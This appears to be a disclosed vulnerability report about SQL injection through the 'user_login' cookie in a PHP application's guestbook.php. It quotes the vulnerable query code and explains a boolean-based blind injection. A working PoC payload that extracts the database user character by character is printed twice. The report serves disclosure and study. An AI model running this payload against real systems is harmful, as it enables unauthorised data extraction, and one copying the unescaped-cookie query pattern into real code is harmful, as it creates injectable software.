### Brief description: As the title says (RT).

### Detailed description:

In common/guestbook.php:

```php
$page= isset($_GET['page'])?$_GET['page']:1;
$memberlogin='匿名';   // '匿名' = "anonymous", the default display name
if(_getcookie("user_login")!=''){
    $disabled=" readonly";
    // The raw cookie value is concatenated into the query without escaping: SQL injection.
    $rs=$db->get_one("select m_email from {$cfg['tb_pre']}member where m_login='"._getcookie("user_login")."'");
    if($rs){
        $memberlogin=_getcookie("user_login");
        $memberemail=$rs['m_email'];   // only set when the query returned a row
    }
}
$query=$db->query("select * from ".$cfg['tb_pre']."help join ".$cfg['tb_pre']."helpsort on `h_sortid`=`s_id` order by h_addtime desc limit 10");
while($row=$db->fetch_array($query)){
    $list[]=$row;
}
$smarty->assign("list",$list);
$smarty->assign('memberlogin',$memberlogin);
$smarty->assign('memberemail',$memberemail);
$smarty->assign('disabled',$disabled);
$smarty->assign('veriArray',$veriArray);
display('common/guestbook.htm');
```

As in the previously reported vulnerability, `_getcookie("user_login")` is not escaped and is concatenated directly into the SQL statement, which gives SQL injection. The bypass of the injection check is not repeated here; it was covered in the earlier report.

Using boolean-based blind injection, the value of `$memberemail` can be controlled (either the value supplied from the front end, or a value read out by the SQL statement). With the PoC below, the injected predicate decides whether the query returns the first member row (so the page renders that member's e-mail) or no row at all (`$rs` is false and the e-mail field stays empty); that visible difference is the boolean oracle. `113` is the ASCII code of `q`, `114` is `r`, so the two screenshots compare the first character of `user()` against those two letters.

POC:

```
' and m_login=@`'` or 1=1 and ord(mid(user(),1,1))=113 limit 0,1 #
```

![BaiduHi_2015-1-12_14-40-15.png](https://images.seebug.org/upload/201501/121550179c2dd1399891f1b3a6fcdf378e62d05a.png)

![BaiduHi_2015-1-12_14-40-33.png](https://images.seebug.org/upload/201501/1215511362235fdabc5e6574d3a418a0539b718c.png)

After changing 113 to 114:

![BaiduHi_2015-1-12_14-40-53.png](https://images.seebug.org/upload/201501/1215513381d00be7d55267ed776b100e9191bb95.png)

### Proof of vulnerability:

POC:

```
' and m_login=@`'` or 1=1 and ord(mid(user(),1,1))=113 limit 0,1 #
```

![BaiduHi_2015-1-12_14-40-15.png](https://images.seebug.org/upload/201501/121550179c2dd1399891f1b3a6fcdf378e62d05a.png)

![BaiduHi_2015-1-12_14-40-33.png](https://images.seebug.org/upload/201501/1215511362235fdabc5e6574d3a418a0539b718c.png)

After changing 113 to 114:

![BaiduHi_2015-1-12_14-40-53.png](https://images.seebug.org/upload/201501/1215513381d00be7d55267ed776b100e9191bb95.png)